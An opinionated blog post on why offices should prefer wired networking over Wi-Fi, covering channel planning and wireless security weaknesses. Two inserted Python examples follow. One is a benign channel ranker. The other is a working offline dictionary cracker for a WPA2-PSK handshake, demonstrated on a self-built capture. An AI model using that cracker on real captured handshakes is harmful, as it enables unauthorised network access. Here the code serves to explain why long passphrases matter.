As of today, June 8 2013, my stance has not changed. If you value reliability and speed in an office of any significant size, USE WIRED connections! Wireless is no substitute. Useful complement, yes*; substitute, no. This is a no-brainer. Any "IT guy" professing otherwise should be fired on the spot and clobbered with an AirPort Express. This article is in fact targeted at you, gentle business owner, so you can make an informed decision.
Terminology:
WAP - Wireless Access Point. The box (usually with two or more antennas sticking out the back) that bridges wireless clients onto your wired LAN.
802.11n - Wireless networking standard. Up to 150 Mbit/s per spatial stream, i.e. about 18 MBytes/second on paper; the common two-stream units are the ones advertised as 300 Mbit/s. You will only see anything like that if you're very lucky.
10/100 Ethernet - Wired network standard, up to 100 Mbit/s, or 12.5 MBytes/second, per port, with nothing shared.
10/100/1000 Ethernet - Wired (gigabit) network standard, up to 1000 Mbit/s, or 125 MBytes/second, per port.
Consider the following.
You move into a spanking new office lot. Your IT vendor goes in, does a site survey (a pretty rare occurrence right there, but let's use our imagination), and says, "let's go 11n wireless!" Upon which you send a PO for one or more Wireless Access Points to said vendor. Come installation day, the vendor does a speed test (another rare occurrence), and you exclaim "300Mbps? I'm not even getting half of that!" You, dear business owner, have fallen victim to a vile lie: that of believing advertised specs.
Fact 1: There is no such thing as 300Mbps throughput from equipment advertised at 300Mbps. It's a lie. It's a bigger lie than advertising a 2TB HDD that has only 1.8TB available (let's not go there just yet).
Fact 2: 300Mbps is the *theoretical* PHY rate (how fast a frame is clocked over the air), not what your file copy sees. Protocol overhead, acknowledgements, retransmissions and the fact that only one radio can talk at a time eat the rest. Even assuming the best case (no other WAP nearby to interfere, no other sources of interference, direct line of sight between client device and WAP, both adjacent to each other, no other devices sharing the wireless), you're not going to get even half that. If you get 50% of theoretical, that'd be outstanding.
Fact 3: Wireless is a shared medium; clients take turns on the air. Roughly, 1 client device may get 150Mbps of throughput, 2 devices would get 75Mbps each, and 10 devices would get 15Mbps each. That's almost as slow as networking technology in the early 90s. It's actually worse than an even split: a distant or slow client takes longer to send each frame, so it eats more than its share of the airtime. The only way to alleviate it is to have more WAPs, e.g. 5 PCs on WAP1 and the next 5 PCs on WAP2, thus load balancing. However there is a problem. Wireless channels are very limited. Which brings me to:
Fact 4: Wireless channels are very limited. In the most popular band, 2.4 GHz, each channel is 20 MHz wide but the channel numbers are only 5 MHz apart, so of the 13 numbered channels only 3 are truly non-overlapping: 1, 6 and 11 (regions that allow all 13, such as Europe and Japan, can squeeze in a tighter 4-channel plan of 1, 5, 9 and 13). Three channels for everyone. Once you put partially overlapping channels next to each other (say channel 1 and channel 3), you get what is known as Adjacent Channel Interference and performance is shot to hell: the other AP's traffic lands on your channel as raw noise that your radio can neither decode nor defer to. It's actually better to have two APs sharing the same channel (both on channel 1), causing Co-Channel Interference, than to have different but overlapping channels. Co-channel interference is anticipated and managed by the design: the radios hear each other and take turns (listen before talk), so the airtime is shared cleanly. Adjacent-channel interference isn't handled by anything. Details: read here (PDF).
Also, most WAPs have a setting called "Auto Channel Selection" or "Clear Channel Selection". This is utter rubbish: it will happily park you on an in-between channel such as 3 or 8 and cause exactly the adjacent-channel interference described above. Do not use it. Take out your Android smartphone, fire up Wifi Analyzer, see which of 1, 6 and 11 has the least traffic at your location, and enter that channel number into your WAP by hand. Then check again in 6 months' time; the neighbours change.
If you have a choice, use the less popular and (for now) more expensive 5 GHz band. There are around 23 non-overlapping channels to choose from, depending on your regulator. 5 GHz does have one major downside: it doesn't penetrate walls very well, so in a multistorey building you may need several 5 GHz WAPs for full coverage. Still, you'll thank me for it.
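To make the channel-picking concrete, here is an added example (my code, not part of the original post) that takes a scan of neighbouring networks, the kind of list Wifi Analyzer shows, and ranks channels 1, 6 and 11 by how much neighbouring signal lands on each. The scan data is constructed for the example. The weighting is a simple heuristic assumed for illustration, not any vendor's algorithm: each neighbour's received power (converted from dBm to milliwatts, because interference adds in linear power) counts in proportion to how much of the 20 MHz channel it overlaps, and the output separates co-channel energy (radios you can hear and take turns with) from partial-overlap energy (raw noise), which is the distinction drawn above.

```python
# Added example, not from the original post: rank 2.4 GHz channels 1/6/11 by
# neighbouring-network energy. The scan list is constructed; the weighting is
# a simple heuristic assumed for illustration, not any vendor's algorithm.

CHANNEL_WIDTH_MHZ = 20  # assumption: everyone runs 20 MHz channels, no 40 MHz 11n


def center_mhz(channel: int) -> int:
    """Centre frequency of a 2.4 GHz channel. Channels 1-13 are 5 MHz apart;
    channel 14 (Japan, 802.11b only) sits 12 MHz above channel 13."""
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    raise ValueError(f"not a 2.4 GHz channel: {channel}")


def overlap_weight(a: int, b: int) -> float:
    """Fraction of a 20 MHz channel that two channels share:
    1.0 = co-channel, 0.0 = clear (e.g. 1 vs 6 are 25 MHz apart)."""
    shared_mhz = max(0, CHANNEL_WIDTH_MHZ - abs(center_mhz(a) - center_mhz(b)))
    return shared_mhz / CHANNEL_WIDTH_MHZ


def dbm_to_mw(dbm: float) -> float:
    """RSSI is logarithmic; interference adds up in linear power."""
    return 10 ** (dbm / 10)


def score_candidates(scan, candidates=(1, 6, 11)):
    """For each candidate channel, sum the received power of every neighbouring
    BSS that overlaps it, weighted by how much it overlaps. Co-channel energy
    (radios you can hear and defer to) is reported separately from
    partial-overlap energy (raw noise your radio cannot decode)."""
    scores = {}
    for cand in candidates:
        co_channel = partial = 0.0
        for _ssid, channel, rssi_dbm in scan:
            w = overlap_weight(cand, channel)
            if w == 0.0:
                continue
            mw = dbm_to_mw(rssi_dbm) * w
            if w == 1.0:
                co_channel += mw
            else:
                partial += mw
        scores[cand] = {"co_channel_mw": co_channel, "partial_mw": partial,
                        "total_mw": co_channel + partial}
    return scores


def rank_channels(scan, candidates=(1, 6, 11)):
    """Candidates ordered from best (least overlapping energy) to worst."""
    scores = score_candidates(scan, candidates)
    return sorted(candidates, key=lambda c: scores[c]["total_mw"])


# Constructed scan in the shape Wifi Analyzer shows: (SSID, channel, RSSI in dBm).
SAMPLE_SCAN = [
    ("CoffeeShop", 1, -45),   # loud, co-channel with 1
    ("NeighbourA", 6, -70),   # weak, co-channel with 6
    ("NeighbourB", 3, -60),   # parked on an in-between channel: hurts both 1 and 6
    ("Printer", 11, -80),     # weak, co-channel with 11
    ("NeighbourC", 13, -65),  # partially overlaps 11
]

if __name__ == "__main__":
    for ch, s in score_candidates(SAMPLE_SCAN).items():
        print(f"channel {ch:2d}: co-channel {s['co_channel_mw']:.2e} mW, "
              f"partial overlap {s['partial_mw']:.2e} mW")
    print("use channel", rank_channels(SAMPLE_SCAN)[0])
```

In the constructed scan the loud coffee shop on channel 1 rules that channel out, and the neighbour who let "auto" park them on channel 3 leaks noise onto both 1 and 6, which is why 11 wins. Feed it a real scan and the same scoring applies; for the 4-channel plan pass `candidates=(1, 5, 9, 13)`.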
Fact 5: WAPs are hopeless beyond 30 clients. Even with 30 clients, network bandwidth will be an issue for anything but the most basic tasks (internet/email).
Fact 6: A site survey may show a clean radio environment NOW, at this very moment. But tomorrow a new office may open up next to you, bringing along 3 WAPs from their old premises. In any kind of multistorey commercial building you could very well have 40 APs in radio range, all fighting over the same 3 channels in the 2.4 GHz band, or the 23 or so in the 5 GHz band.
Fact 7: Wireless performance depends on how polluted the radio environment is, and there is a LOT of competition for the 2.4 GHz range: cordless phones, baby monitors, motors, Bluetooth devices, and microwave ovens (they cook at 2.45 GHz because it sits in the same unlicensed ISM band, not because water has a special resonance there, and every oven leaks a little). All of these conspire to make your wireless network slower than Streamyx.
Fact 8: If you're doing file transfer regularly across the network, or opening files from a server, or running an accounting or any application off a network drive, wireless is not for you unless you're a zen master with unlimited patience. Just don't do it. The difference in speed can be ridiculously dramatic. What may take 1 minute on wireless could take 5 seconds on wired.
Fact 9: We've been talking about performance and reliability thus far. But wireless is inherently LESS SECURE than wired. To hack your wired network, someone needs to enter your office and physically plug in a sniffer. To hack your wireless network, they just need to exploit your misconfiguration from the adjacent office, or from a few hundred metres away on the main road with a directional antenna. And believe me, hacking wireless networks is pretty easy. Let me count the ways:
- a) Open networks - running a WAP without a password. Pretty rare nowadays; no one's that ignorant. Once upon a time, well-intentioned folks left their APs open so the neighbours could use them when needed. No good deed goes unpunished nowadays.
- b) Using WEP encryption - totally broken. Freely available tools (aircrack-ng and friends) recover a WEP key in minutes by collecting and replaying traffic; no password guessing required.
- c) Using WPA/TKIP encryption - broken too, though it takes a bit more effort than b). TKIP has known packet-injection weaknesses, and with any pre-shared-key network (WPA or WPA2) an attacker who records the 4-way handshake can guess the passphrase offline at leisure. Because the key is derived from the passphrase and the SSID, rainbow tables precomputed for common SSIDs make the guessing near-instant.
- d) WPS - supposed to make joining a wireless network easy, and it did, for hackers too: the 8-digit PIN is verified in two halves, so an attacker needs on the order of 11,000 guesses rather than 100 million, and tools automate this against the AP from outside.
- e) AP SSID spoofing - hackers pretend their rogue AP is yours (the "evil twin"), and your staff's laptops connect to it automatically.
- f) etc etc etc.
*For most normal networks, where you don't need to worry about alphabet-soup compliance such as PCI-DSS and HIPAA, you can just use WPA2-PSK or WPA2-Enterprise (for now anyway). Easy to use, moderately secure. One caveat on WPA2-PSK: the handshake can be recorded and the passphrase guessed offline, so it is only as strong as the passphrase. Use a long random one, and change it when staff leave, since everyone shares the same key.
For secure networks, that's not enough. The best practice in that scenario is to put the APs into their own untrusted subnet, firewalled off from the office LAN, and require a VPN to reach LAN resources. You layer your security that way: even if the WPA2 scheme were proven insecure, you'd still have the VPN protecting your traffic.
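As an added example (my code, not from the post or any tool it mentions), here is the offline attack that makes c) and the WPA2-PSK caveat real: a sniffer records the 4-way handshake, and the attacker then derives keys from candidate passphrases until one reproduces the MIC on the EAPOL frame. The key derivation follows IEEE 802.11i (PBKDF2 over passphrase and SSID, the PRF to a PTK, HMAC-SHA1 for the MIC). The "captured" handshake is constructed inside the script from a known weak passphrase so it runs offline; the MAC addresses, nonces, frame layout and wordlist are all made up for the example.

```python
# Added example, not from the original post: offline dictionary attack on a
# WPA2-PSK 4-way handshake. The capture below is CONSTRUCTED from a known
# passphrase; MACs, nonces and frame bytes are made up for illustration.
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The SSID is the salt, which is why rainbow tables are built per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-384: PTK = KCK(16) | KEK(16) | TK(16) for CCMP."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):  # 3 x 20 bytes covers the 48 needed
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:48]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame)[:16],
    computed over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# --- constructed "capture": what a sniffer in the next office would record ---
SSID = "OfficeNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 of 4, MIC field zeroed (assumed layout: CCMP, no key data).
EAPOL_M2 = (
    b"\x01\x03\x00\x5f"                       # 802.1X v1, type Key, body length 95
    + b"\x02\x01\x0a"                         # descriptor RSN; key info: pairwise|MIC|version 2
    + b"\x00\x10"                             # key length 16
    + b"\x00" * 8                             # replay counter
    + SNONCE
    + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # key IV, RSC, reserved
    + b"\x00" * 16                            # MIC field, zero while computing/verifying
    + b"\x00\x00"                             # key data length 0
)


def make_capture(true_passphrase: str) -> dict:
    """Simulate the legitimate STA: derive the real KCK and stamp a MIC on message 2."""
    pmk = pmk_from_passphrase(true_passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return {"ssid": SSID, "aa": AP_MAC, "spa": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": EAPOL_M2, "mic": eapol_mic(kck, EAPOL_M2)}


def crack_handshake(capture: dict, wordlist):
    """Attacker side: one PBKDF2 + one PRF per guess; no further contact with the AP.
    Returns the passphrase that reproduces the captured MIC, or None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = ptk_from_pmk(pmk, capture["aa"], capture["spa"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None


CAPTURE = make_capture("Welcome123")  # constructed: the office chose a weak passphrase
WORDLIST = ["password", "12345678", "letmein", "Welcome123", "qwertyuiop"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_handshake(CAPTURE, WORDLIST))
```

The 4096 PBKDF2 iterations are what make each guess slow, and a rainbow table pays that cost once per SSID; a unique SSID plus a long random passphrase pushes the cost back onto the attacker. Note that nothing here touches the AP after the handshake is recorded, so rate limiting and logging on the AP never see the attack.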
Technologies available for wireless
802.11n - 5 GHz - USE THIS band if you have a choice. Unfortunately, plenty of laptops can't do it. The good news is that newer devices like the iPad 2, Samsung Galaxy S3 and Galaxy Tab are 5 GHz capable. Buy an AP that is dual radio (sometimes sold as "simultaneous dual band"), not merely dual band. Dual radio serves 5 GHz and 2.4 GHz at the same time; with plain dual band you pick one band or the other. Dual radio = GOOD, future proofing.
802.11n - 2.4 GHz - the de facto vanilla standard today.
802.11g - 2.4 GHz - dump these.
802.11a - 5 GHz - old and slow, but mostly reliable. Never caught on.
802.11b - get rid of this device immediately. One 11b client on the air forces the AP into legacy protection mode (extra RTS/CTS overhead before frames), which drags down 11g and 11n speeds for everyone.
Around the corner: the 802.11ac draft standard (here we go again). Barely any devices in the market yet, and those are draft-compliant only.
My background: dealing with dozens of wireless setups by incompetent vendors who leave things at default. Started messing with APs at Intel in 2000/2001 when Intel came out with their line of enterprise APs. Currently have a rooted Android with Firesheep and WiFi Kill. Purely as a teaching tool, of course.